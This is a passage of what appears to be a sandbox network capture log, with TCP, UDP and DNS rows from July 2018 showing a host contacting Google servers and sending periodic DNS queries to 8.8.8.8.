Jul 4, 2018 14:05:39.942795992 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.942924976 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.943023920 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.943142891 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.943624973 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.943715096 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.943751097 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.943850994 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.944329023 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.944452047 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.944555998 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.944678068 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.945131063 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.945223093 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.945261002 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.945360899 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.945939064 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.946013927 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.946063042 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.946162939 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.946567059 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.946656942 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.946688890 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.946794033 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.947287083 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.947365999 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.947417974 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.947500944 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.948065996 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.948148966 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.948229074 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.948302984 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.948739052 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.948822975 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.948890924 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.949059010 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.949619055 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.949703932 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.949743986 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.949839115 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.950364113 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.950444937 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.950490952 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.950602055 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.951067924 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.951158047 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.951193094 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.951303005 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.953054905 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.953104973 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.953191042 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.953305006 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.953694105 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.953785896 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.953814983 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.953929901 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.953982115 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.954090118 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.954098940 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.954195976 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.954658031 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.954746008 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.954785109 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.954893112 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.954937935 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.955045938 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.955089092 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.955200911 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.955586910 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.955686092 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.955703974 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.955822945 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.955862999 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.955965042 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.955972910 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.956083059 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.962466002 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.962680101 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.969109058 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.969268084 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.969463110 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.969566107 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.969638109 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.969717026 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.969769001 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.969880104 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.969892979 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.969989061 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.970009089 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.970191002 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.970272064 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.970381021 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.970381975 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.970489025 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.970491886 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.970599890 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.970642090 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.970710993 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.970722914 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.970870018 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.971261978 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.971344948 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.971388102 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.971402884 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.971483946 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.971493959 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:39.975580931 CEST44349684216.58.210.4192.168.0.60
Jul 4, 2018 14:05:39.975801945 CEST49684443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.060034037 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.070652962 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.070839882 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.072843075 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.083287001 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.085201979 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.085460901 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.098721981 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.105122089 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.115916967 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.195065022 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.195204973 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.195339918 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.195424080 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.195838928 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.195929050 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.196126938 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.196204901 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.196238041 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.196316004 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.196885109 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.196974039 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.197140932 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.197263002 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.197778940 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.197813034 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.197890043 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.198077917 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.198184967 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.198645115 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.198749065 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.203852892 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.203866959 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.206208944 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.206257105 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.206324100 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.206393003 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.206928015 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.207006931 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.207027912 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.207078934 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.207672119 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.207747936 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.207777977 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.207829952 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.208385944 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.208462000 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.208488941 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.208590031 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.209019899 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.209119081 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.209120989 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.209201097 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.209995031 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.210040092 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.210094929 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.210150003 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.210918903 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.211020947 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.211158037 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.211249113 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.211272955 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.211355925 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.211427927 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.211512089 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.212157965 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.212258101 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.212410927 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.212500095 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.212717056 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.212805033 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.212910891 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.213000059 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.213455915 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.213548899 CEST44349686216.58.210.4192.168.0.60
Jul 4, 2018 14:05:40.213557005 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.213625908 CEST49686443192.168.0.60216.58.210.4
Jul 4, 2018 14:05:40.230839968 CEST6425353192.168.0.608.8.8.8
Jul 4, 2018 14:05:40.546510935 CEST53642538.8.8.8192.168.0.60
Jul 4, 2018 14:05:40.549282074 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:41.551414013 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:41.597203016 CEST44349687212.92.98.68192.168.0.60
Jul 4, 2018 14:05:41.597553968 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:41.601437092 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:41.647375107 CEST44349687212.92.98.68192.168.0.60
Jul 4, 2018 14:05:41.651798964 CEST44349687212.92.98.68192.168.0.60
Jul 4, 2018 14:05:41.651873112 CEST44349687212.92.98.68192.168.0.60
Jul 4, 2018 14:05:41.652049065 CEST44349687212.92.98.68192.168.0.60
Jul 4, 2018 14:05:41.652301073 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:41.652509928 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:41.862624884 CEST4985853192.168.0.608.8.8.8
Jul 4, 2018 14:05:41.898453951 CEST53498588.8.8.8192.168.0.60
Jul 4, 2018 14:05:41.975562096 CEST5253053192.168.0.608.8.8.8
Jul 4, 2018 14:05:42.005597115 CEST53525308.8.8.8192.168.0.60
Jul 4, 2018 14:05:42.009633064 CEST4968980192.168.0.6023.10.249.152
Jul 4, 2018 14:05:42.015372038 CEST804968923.10.249.152192.168.0.60
Jul 4, 2018 14:05:42.015520096 CEST4968980192.168.0.6023.10.249.152
Jul 4, 2018 14:05:42.016604900 CEST4968980192.168.0.6023.10.249.152
Jul 4, 2018 14:05:42.017718077 CEST804968923.10.249.152192.168.0.60
Jul 4, 2018 14:05:42.017800093 CEST4968980192.168.0.6023.10.249.152
Jul 4, 2018 14:05:42.021352053 CEST804968923.10.249.152192.168.0.60
Jul 4, 2018 14:05:42.133256912 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:42.178844929 CEST44349687212.92.98.68192.168.0.60
Jul 4, 2018 14:05:42.179035902 CEST49687443192.168.0.60212.92.98.68
Jul 4, 2018 14:05:42.213829994 CEST804968923.10.249.152192.168.0.60
Jul 4, 2018 14:05:42.262593985 CEST6483853192.168.0.608.8.8.8
Jul 4, 2018 14:05:42.269879103 CEST4968980192.168.0.6023.10.249.152
Jul 4, 2018 14:05:42.288446903 CEST53648388.8.8.8192.168.0.60
Jul 4, 2018 14:05:47.267944098 CEST5763953192.168.0.608.8.8.8
Jul 4, 2018 14:05:47.297177076 CEST53576398.8.8.8192.168.0.60
Jul 4, 2018 14:05:52.312407017 CEST5200153192.168.0.608.8.8.8
Jul 4, 2018 14:05:52.338326931 CEST53520018.8.8.8192.168.0.60
Jul 4, 2018 14:05:57.360927105 CEST6307853192.168.0.608.8.8.8
Jul 4, 2018 14:05:57.386904001 CEST53630788.8.8.8192.168.0.60
Jul 4, 2018 14:06:02.339490891 CEST5779453192.168.0.608.8.8.8
Jul 4, 2018 14:06:02.364025116 CEST53577948.8.8.8192.168.0.60
Jul 4, 2018 14:06:07.446363926 CEST6467053192.168.0.608.8.8.8
Jul 4, 2018 14:06:07.470928907 CEST53646708.8.8.8192.168.0.60
Jul 4, 2018 14:06:12.509696007 CEST5089553192.168.0.608.8.8.8
Jul 4, 2018 14:06:12.534456968 CEST53508958.8.8.8192.168.0.60
Jul 4, 2018 14:06:17.473352909 CEST5861553192.168.0.608.8.8.8
Jul 4, 2018 14:06:17.499186993 CEST53586158.8.8.8192.168.0.60
Jul 4, 2018 14:06:22.512562037 CEST6332153192.168.0.608.8.8.8
Jul 4, 2018 14:06:22.540262938 CEST53633218.8.8.8192.168.0.60
Jul 4, 2018 14:06:27.564419985 CEST5364653192.168.0.608.8.8.8
Jul 4, 2018 14:06:27.590655088 CEST53536468.8.8.8192.168.0.60
Jul 4, 2018 14:06:32.555356979 CEST5223653192.168.0.608.8.8.8
Jul 4, 2018 14:06:32.582084894 CEST53522368.8.8.8192.168.0.60
Jul 4, 2018 14:06:37.566991091 CEST6429053192.168.0.608.8.8.8
Jul 4, 2018 14:06:37.607074976 CEST53642908.8.8.8192.168.0.60
Jul 4, 2018 14:06:39.857311964 CEST5923653192.168.0.608.8.8.8
Jul 4, 2018 14:06:39.895287991 CEST53592368.8.8.8192.168.0.60
Jul 4, 2018 14:06:42.662039995 CEST5180053192.168.0.608.8.8.8
Jul 4, 2018 14:06:42.690570116 CEST53518008.8.8.8192.168.0.60
Jul 4, 2018 14:06:47.588325977 CEST5635053192.168.0.608.8.8.8
Jul 4, 2018 14:06:47.613600016 CEST53563508.8.8.8192.168.0.60
Jul 4, 2018 14:06:52.593498945 CEST5479953192.168.0.608.8.8.8
Jul 4, 2018 14:06:52.622417927 CEST53547998.8.8.8192.168.0.60
Jul 4, 2018 14:06:57.642504930 CEST4917153192.168.0.608.8.8.8
Jul 4, 2018 14:06:57.680715084 CEST53491718.8.8.8192.168.0.60
Jul 4, 2018 14:07:02.648781061 CEST5583353192.168.0.608.8.8.8
Jul 4, 2018 14:07:02.677544117 CEST53558338.8.8.8192.168.0.60
Jul 4, 2018 14:07:07.652491093 CEST6375953192.168.0.608.8.8.8
Jul 4, 2018 14:07:07.680706978 CEST53637598.8.8.8192.168.0.60
Jul 4, 2018 14:07:12.720355034 CEST5467953192.168.0.608.8.8.8
Jul 4, 2018 14:07:12.745070934 CEST53546798.8.8.8192.168.0.60
Jul 4, 2018 14:07:17.682972908 CEST6108053192.168.0.608.8.8.8
Jul 4, 2018 14:07:17.707748890 CEST53610808.8.8.8192.168.0.60
Jul 4, 2018 14:07:22.702013969 CEST6089253192.168.0.608.8.8.8
Jul 4, 2018 14:07:22.729052067 CEST53608928.8.8.8192.168.0.60
Jul 4, 2018 14:07:27.755734921 CEST6361953192.168.0.608.8.8.8
Jul 4, 2018 14:07:27.783169985 CEST53636198.8.8.8192.168.0.60
Jul 4, 2018 14:07:29.634063959 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:07:29.634335995 CEST4968980192.168.0.6023.10.249.152
Jul 4, 2018 14:07:29.639231920 CEST804968923.10.249.152192.168.0.60
Jul 4, 2018 14:07:29.639436960 CEST4968980192.168.0.6023.10.249.152
Jul 4, 2018 14:07:29.645044088 CEST8049685216.58.210.14192.168.0.60
Jul 4, 2018 14:07:29.645468950 CEST4968580192.168.0.60216.58.210.14
Jul 4, 2018 14:07:32.736481905 CEST6310853192.168.0.608.8.8.8
Jul 4, 2018 14:07:32.762871027 CEST53631088.8.8.8192.168.0.60
Jul 4, 2018 14:07:37.729584932 CEST6541053192.168.0.608.8.8.8
Jul 4, 2018 14:07:38.727833986 CEST6541053192.168.0.608.8.8.8
Jul 4, 2018 14:07:38.752954006 CEST53654108.8.8.8192.168.0.60
Jul 4, 2018 14:07:42.817245960 CEST5575153192.168.0.608.8.8.8
Jul 4, 2018 14:07:42.844554901 CEST53557518.8.8.8192.168.0.60
Jul 4, 2018 14:07:47.789988995 CEST5279653192.168.0.608.8.8.8
Jul 4, 2018 14:07:47.815148115 CEST53527968.8.8.8192.168.0.60
Jul 4, 2018 14:07:52.800857067 CEST5496453192.168.0.608.8.8.8
Jul 4, 2018 14:07:52.829034090 CEST53549648.8.8.8192.168.0.60
Jul 4, 2018 14:07:57.857134104 CEST6067453192.168.0.608.8.8.8
Jul 4, 2018 14:07:57.882422924 CEST53606748.8.8.8192.168.0.60
Jul 4, 2018 14:08:02.837874889 CEST6481953192.168.0.608.8.8.8
Jul 4, 2018 14:08:02.862816095 CEST53648198.8.8.8192.168.0.60
Jul 4, 2018 14:08:07.840035915 CEST6256253192.168.0.608.8.8.8
Jul 4, 2018 14:08:07.880552053 CEST53625628.8.8.8192.168.0.60
Jul 4, 2018 14:08:12.922791958 CEST4957753192.168.0.608.8.8.8
Jul 4, 2018 14:08:12.948163033 CEST53495778.8.8.8192.168.0.60
Jul 4, 2018 14:08:17.827440977 CEST6188653192.168.0.608.8.8.8
Jul 4, 2018 14:08:17.852802038 CEST53618868.8.8.8192.168.0.60

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 4, 2018 14:05:39.356622934 CEST6075753192.168.0.608.8.8.8
Jul 4, 2018 14:05:39.374761105 CEST53607578.8.8.8192.168.0.60
Jul 4, 2018 14:05:39.648799896 CEST4950153192.168.0.608.8.8.8
Jul 4, 2018 14:05:39.668544054 CEST53495018.8.8.8192.168.0.60
Jul 4, 2018 14:05:40.230839968 CEST6425353192.168.0.608.8.8.8
Jul 4, 2018 14:05:40.546510935 CEST53642538.8.8.8192.168.0.60
Jul 4, 2018 14:05:41.862624884 CEST4985853192.168.0.608.8.8.8
Jul 4, 2018 14:05:41.898453951 CEST53498588.8.8.8192.168.0.60
Jul 4, 2018 14:05:41.975562096 CEST5253053192.168.0.608.8.8.8
Jul 4, 2018 14:05:42.005597115 CEST53525308.8.8.8192.168.0.60
Jul 4, 2018 14:05:42.262593985 CEST6483853192.168.0.608.8.8.8
Jul 4, 2018 14:05:42.288446903 CEST53648388.8.8.8192.168.0.60
Jul 4, 2018 14:05:47.267944098 CEST5763953192.168.0.608.8.8.8
Jul 4, 2018 14:05:47.297177076 CEST53576398.8.8.8192.168.0.60
Jul 4, 2018 14:05:52.312407017 CEST5200153192.168.0.608.8.8.8
Jul 4, 2018 14:05:52.338326931 CEST53520018.8.8.8192.168.0.60
Jul 4, 2018 14:05:57.360927105 CEST6307853192.168.0.608.8.8.8
Jul 4, 2018 14:05:57.386904001 CEST53630788.8.8.8192.168.0.60
Jul 4, 2018 14:06:02.339490891 CEST5779453192.168.0.608.8.8.8
Jul 4, 2018 14:06:02.364025116 CEST53577948.8.8.8192.168.0.60
Jul 4, 2018 14:06:07.446363926 CEST6467053192.168.0.608.8.8.8
Jul 4, 2018 14:06:07.470928907 CEST53646708.8.8.8192.168.0.60
Jul 4, 2018 14:06:12.509696007 CEST5089553192.168.0.608.8.8.8
Jul 4, 2018 14:06:12.534456968 CEST53508958.8.8.8192.168.0.60
Jul 4, 2018 14:06:17.473352909 CEST5861553192.168.0.608.8.8.8
Jul 4, 2018 14:06:17.499186993 CEST53586158.8.8.8192.168.0.60
Jul 4, 2018 14:06:22.512562037 CEST6332153192.168.0.608.8.8.8
Jul 4, 2018 14:06:22.540262938 CEST53633218.8.8.8192.168.0.60
Jul 4, 2018 14:06:27.564419985 CEST5364653192.168.0.608.8.8.8
Jul 4, 2018 14:06:27.590655088 CEST53536468.8.8.8192.168.0.60
Jul 4, 2018 14:06:32.555356979 CEST5223653192.168.0.608.8.8.8
Jul 4, 2018 14:06:32.582084894 CEST53522368.8.8.8192.168.0.60
Jul 4, 2018 14:06:37.566991091 CEST6429053192.168.0.608.8.8.8
Jul 4, 2018 14:06:37.607074976 CEST53642908.8.8.8192.168.0.60
Jul 4, 2018 14:06:39.857311964 CEST5923653192.168.0.608.8.8.8
Jul 4, 2018 14:06:39.895287991 CEST53592368.8.8.8192.168.0.60
Jul 4, 2018 14:06:42.662039995 CEST5180053192.168.0.608.8.8.8
Jul 4, 2018 14:06:42.690570116 CEST53518008.8.8.8192.168.0.60
Jul 4, 2018 14:06:47.588325977 CEST5635053192.168.0.608.8.8.8
Jul 4, 2018 14:06:47.613600016 CEST53563508.8.8.8192.168.0.60
Jul 4, 2018 14:06:52.593498945 CEST5479953192.168.0.608.8.8.8
Jul 4, 2018 14:06:52.622417927 CEST53547998.8.8.8192.168.0.60
Jul 4, 2018 14:06:57.642504930 CEST4917153192.168.0.608.8.8.8
Jul 4, 2018 14:06:57.680715084 CEST53491718.8.8.8192.168.0.60
Jul 4, 2018 14:07:02.648781061 CEST5583353192.168.0.608.8.8.8
Jul 4, 2018 14:07:02.677544117 CEST53558338.8.8.8192.168.0.60
Jul 4, 2018 14:07:07.652491093 CEST6375953192.168.0.608.8.8.8
Jul 4, 2018 14:07:07.680706978 CEST53637598.8.8.8192.168.0.60
Jul 4, 2018 14:07:12.720355034 CEST5467953192.168.0.608.8.8.8
Jul 4, 2018 14:07:12.745070934 CEST53546798.8.8.8192.168.0.60
Jul 4, 2018 14:07:17.682972908 CEST6108053192.168.0.608.8.8.8
Jul 4, 2018 14:07:17.707748890 CEST53610808.8.8.8192.168.0.60
Jul 4, 2018 14:07:22.702013969 CEST6089253192.168.0.608.8.8.8
Jul 4, 2018 14:07:22.729052067 CEST53608928.8.8.8192.168.0.60
Jul 4, 2018 14:07:27.755734921 CEST6361953192.168.0.608.8.8.8
Jul 4, 2018 14:07:27.783169985 CEST53636198.8.8.8192.168.0.60
Jul 4, 2018 14:07:32.736481905 CEST6310853192.168.0.608.8.8.8
Jul 4, 2018 14:07:32.762871027 CEST53631088.8.8.8192.168.0.60
Jul 4, 2018 14:07:37.729584932 CEST6541053192.168.0.608.8.8.8
Jul 4, 2018 14:07:38.727833986 CEST6541053192.168.0.608.8.8.8
Jul 4, 2018 14:07:38.752954006 CEST53654108.8.8.8192.168.0.60
Jul 4, 2018 14:07:42.817245960 CEST5575153192.168.0.608.8.8.8
Jul 4, 2018 14:07:42.844554901 CEST53557518.8.8.8192.168.0.60
Jul 4, 2018 14:07:47.789988995 CEST5279653192.168.0.608.8.8.8
Jul 4, 2018 14:07:47.815148115 CEST53527968.8.8.8192.168.0.60
Jul 4, 2018 14:07:52.800857067 CEST5496453192.168.0.608.8.8.8
Jul 4, 2018 14:07:52.829034090 CEST53549648.8.8.8192.168.0.60
Jul 4, 2018 14:07:57.857134104 CEST6067453192.168.0.608.8.8.8
Jul 4, 2018 14:07:57.882422924 CEST53606748.8.8.8192.168.0.60
Jul 4, 2018 14:08:02.837874889 CEST6481953192.168.0.608.8.8.8
Jul 4, 2018 14:08:02.862816095 CEST53648198.8.8.8192.168.0.60
Jul 4, 2018 14:08:07.840035915 CEST6256253192.168.0.608.8.8.8
Jul 4, 2018 14:08:07.880552053 CEST53625628.8.8.8192.168.0.60
Jul 4, 2018 14:08:12.922791958 CEST4957753192.168.0.608.8.8.8
Jul 4, 2018 14:08:12.948163033 CEST53495778.8.8.8192.168.0.60
Jul 4, 2018 14:08:17.827440977 CEST6188653192.168.0.608.8.8.8
Jul 4, 2018 14:08:17.852802038 CEST53618868.8.8.8192.168.0.60

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Jul 4, 2018 14:05:39.356622934 CEST192.168.0.608.8.8.80x8f18Standard query (0)www.google.comA (IP address)IN (0x0001)
Jul 4, 2018 14:05:39.648799896 CEST192.168.0.608.8.8.80x990aStandard query (0)ocsp.pki.googA (IP address)IN (0x0001)
